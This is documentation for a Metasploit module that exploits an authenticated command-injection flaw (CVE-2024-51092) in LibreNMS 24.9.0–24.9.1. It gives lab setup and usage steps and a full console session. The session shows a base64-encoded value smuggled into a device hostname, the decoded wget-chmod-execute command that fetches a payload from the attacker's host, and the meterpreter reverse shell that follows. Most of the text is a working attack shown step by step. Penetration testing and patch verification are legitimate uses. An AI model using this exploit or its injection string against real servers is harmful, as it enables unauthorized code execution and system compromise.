## Vulnerable Application

An authenticated attacker can create dangerous directory names on the system and
alter sensitive configuration parameters through the web portal.
Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls,
thus achieving arbitrary code execution.

The vulnerability affects:

    * 24.9.0 <= LibreNMS <= 24.9.1

This module was successfully tested on:

    * LibreNMS 24.9.0 installed on Ubuntu 22.04
    * LibreNMS 24.9.1 installed on Ubuntu 22.04


### Installation

1. Follow the [official instructions](https://docs.librenms.org/Installation/Install-LibreNMS/).
After git clone, change version: `git checkout tags/24.9.1`.

2. Comment out the last line in `/etc/cron.d/librenms`:
`19 0 * * * librenms /opt/librenms/daily.sh >> /dev/null 2>&1`.
Otherwise, the version will be updated to the latest, causing the exploit to fail.


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092`
4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
5. (Optional) Do: `php artisan device:poll all` on the victim machine or wait up to 5 minutes (default cron setting)
6. You should get a meterpreter


## Options
### USERNAME (required)
User name for LibreNMS.

### PASSWORD (required)
Password for LibreNMS.

### PATH (required)
LibreNMS installed location. Default is `/opt/librenms`.

### WAIT (required)
Wait time (seconds) for cron to poll the device. Default is `315`.


## Scenarios
```
msf > use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > options

Module options (exploit/linux/http/librenms_authenticated_rce_cve_2024_51092):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password for LibreNMS
   PATH      /opt/librenms    yes       LibreNMS installed location
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME                   yes       User name for LibreNMS
   VHOST                      no        HTTP server virtual host
   WAIT      315              yes       Wait time (seconds) for cron to poll the device


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      n                no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH       s                no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > run lhost=192.168.56.1 rhost=192.168.56.17 username=librenms password=librenms
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Successfully logged into LibreNMS.
[+] The target appears to be vulnerable. LibreNMS version 24.9.1 detected, which is vulnerable.
[*] Try to add host: 'f;echo d2dldCAtcU8gLi9uIGh0dHA6Ly8xOTIuMTY4LjU2LjE6ODA4MC9zO2NobW9kICt4IC4vbjsuL24m|base64 -d|bash;#', length: 100
[*] Added host.
[*] Actual payload: wget -qO ./n http://192.168.56.1:8080/s;chmod +x ./n;./n&
[*] Waiting up to 315 seconds for cron to poll the device...
[*] Sending stage (3045380 bytes) to 192.168.56.17
[+] Deleted n
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:40228) at 2025-01-17 21:19:20 +0900
[*] Reset snmpget to default.
[*] Deleted device: 353

meterpreter > getuid
Server username: librenms
meterpreter > sysinfo
Computer     : 192.168.56.17
OS           : Ubuntu 22.04 (Linux 6.8.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
